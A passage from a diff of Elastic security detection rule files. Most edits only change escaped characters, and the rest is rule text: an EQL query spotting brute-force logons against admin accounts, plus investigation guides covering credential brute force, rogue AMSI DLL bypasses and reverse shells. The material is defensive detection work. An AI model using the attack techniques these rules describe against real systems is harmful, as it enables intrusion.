access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and user.name : \"*admin*\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_102.json b/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_102.json index c49a03be7d0..dac61eaeb2b 100644 --- a/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_102.json +++ b/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_102.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -68,7 +68,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_103.json b/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_103.json index bef704e2cba..c52915769be 100644 --- a/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_103.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -65,7 +65,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -95,7 +95,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_104.json b/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_104.json index 96b27f998f5..e0e078f75a1 100644 --- a/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_104.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -65,7 +65,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -95,7 +95,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_205.json b/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_205.json index 7361e2f4681..a73ad0fdbe8 100644 --- a/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_205.json +++ b/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_205.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -65,7 +65,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -95,7 +95,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_103.json b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_103.json index 95c04755a86..1d2609c875d 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_103.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "fa01341d-6662-426b-9d0c-6d81e33c8a9d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_104.json b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_104.json index 649ec797585..4c679f3fbe4 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_104.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "fa01341d-6662-426b-9d0c-6d81e33c8a9d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_105.json b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_105.json index bdde3b1d174..a8d43f2c487 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_105.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "fa01341d-6662-426b-9d0c-6d81e33c8a9d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_106.json b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_106.json index 9817c3e244e..55a2d84bd64 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_106.json +++ b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_106.json @@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "fa01341d-6662-426b-9d0c-6d81e33c8a9d", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_1.json b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_1.json index e4ef3b492d4..e1c8c1b8e04 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_1.json +++ b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_1.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_2.json b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_2.json index 826650603b5..12e49a1e33c 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_2.json +++ b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_2.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_3.json b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_3.json index 996bca81c4c..1cc9d438c63 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_3.json +++ b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_3.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_4.json b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_4.json index 563f6b534f4..5084d38bf3f 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_4.json +++ b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_4.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_5.json b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_5.json index ef721bcc8e9..6c1b24af4b0 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_5.json +++ b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_5.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_1.json b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_1.json index 958158adb82..d4a211991cb 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_1.json +++ b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_1.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_2.json b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_2.json index c4e153706c7..285c9a685fe 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_2.json +++ b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_2.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_3.json b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_3.json index 1e7458022b1..a9905581875 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_3.json +++ b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_3.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_4.json b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_4.json index cc6399b4216..d2e80d2fa92 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_4.json +++ b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_4.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_5.json b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_5.json index e02c63fe2c0..f2e01bb8b5e 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_5.json +++ b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_5.json @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_6.json b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_6.json index 69610812a55..21ffc2e0a4a 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_6.json +++ b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_6.json @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_2.json b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_2.json index 3100d1c72da..796562dcd32 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_2.json +++ b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_2.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Antimalware Scan Interface DLL", - "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the 